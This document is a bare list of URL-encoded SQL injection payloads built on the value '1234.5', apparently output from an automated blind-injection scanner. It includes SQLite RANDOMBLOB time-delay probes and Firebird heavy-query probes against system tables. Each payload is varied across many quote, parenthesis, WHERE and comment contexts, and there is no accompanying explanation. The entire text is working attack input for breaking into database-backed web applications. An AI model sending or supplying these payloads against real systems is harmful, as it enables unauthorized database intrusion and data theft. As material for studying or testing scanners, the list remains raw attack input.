1234.5%22%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%29%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%29%29%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%29%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%29%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%29%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%29%29%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%29%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%29%29%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%25%27%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%25%27%29%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%25%27%29%29%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%25%27%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%00%27%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%00%27%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%29%20WHERE%205461%3D5461%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%29%20WHERE%204456%3D4456%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%29%20WHERE%207589%3D7589%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%20WHERE%206900%3D6900%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%22%20WHERE%208686%3D8686%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%20WHERE%202423%3D2423%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%7C%7C%28SELECT%20%27Bkdr%27%20FROM%20DUAL%20WHERE%201352%3D1352%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%7C%7C%28SELECT%20%27rZnf%27%20WHERE%207168%3D7168%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%2B%28SELECT%20ohLv%20WHERE%209412%3D9412%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%2B%28SELECT%20%27VDhA%27%20WHERE%209993%3D9993%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%208718%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1234.5%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 1234.5%27%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 1234.5%27%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 1234.5%22%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 1234.5%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%287860%3D7860 1234.5%29%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%283840%3D3840 1234.5%29%29%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%289844%3D9844 1234.5%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 1234.5%27%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27vzjr%27%3D%27vzjr 1234.5%27%29%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27PaBr%27%3D%27PaBr 1234.5%27%29%29%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27FdzQ%27%3D%27FdzQ 1234.5%27%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27KCFs%27%3D%27KCFs 1234.5%27%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27yUsQ%27%20LIKE%20%27yUsQ 1234.5%27%29%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27iuHn%27%20LIKE%20%27iuHn 1234.5%27%29%29%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27BZXL%27%20LIKE%20%27BZXL 1234.5%27%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27Dkoo%27%20LIKE%20%27Dkoo 1234.5%22%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%22GKRJ%22%3D%22GKRJ 1234.5%22%29%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%22tbxl%22%3D%22tbxl 1234.5%22%29%29%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%22vARy%22%3D%22vARy 1234.5%22%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%22CNMU%22%3D%22CNMU 1234.5%22%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%22PKWa%22%20LIKE%20%22PKWa 1234.5%22%29%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%22BKQq%22%20LIKE%20%22BKQq 1234.5%22%29%29%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%22CJBu%22%20LIKE%20%22CJBu 1234.5%22%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%22FObm%22%20LIKE%20%22FObm 1234.5%25%27%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27qFjl%27%3D%27qFjl 1234.5%00%27%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27mCtO%27%3D%27mCtO 1234.5%27%29%20WHERE%204292%3D4292%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 1234.5%22%29%20WHERE%207956%3D7956%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 1234.5%29%20WHERE%204278%3D4278%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 1234.5%27%20WHERE%209880%3D9880%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 1234.5%22%20WHERE%204820%3D4820%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 1234.5%20WHERE%209977%3D9977%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27ZSXG%27%20FROM%20DUAL%20WHERE%206336%3D6336%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27onGt%27%20WHERE%208244%3D8244%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20Znut%20WHERE%205684%3D5684%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27jCVC%27%20WHERE%206256%3D6256%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%204947%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20%23 1234.5%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%22%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%29%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%29%29%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%29%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%29%29%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%29%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%29%29%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%22%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%22%29%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%22%29%29%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%22%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%22%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%22%29%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%22%29%29%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%22%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%25%27%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%25%27%29%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%25%27%29%29%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%25%27%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%00%27%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%00%27%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%29%20WHERE%203227%3D3227%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%22%29%20WHERE%202145%3D2145%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%29%20WHERE%202070%3D2070%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%20WHERE%204314%3D4314%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%22%20WHERE%209868%3D9868%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%20WHERE%205848%3D5848%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%7C%7C%28SELECT%20%27kuNg%27%20FROM%20DUAL%20WHERE%206925%3D6925%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%7C%7C%28SELECT%20%27BwvD%27%20WHERE%207327%3D7327%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 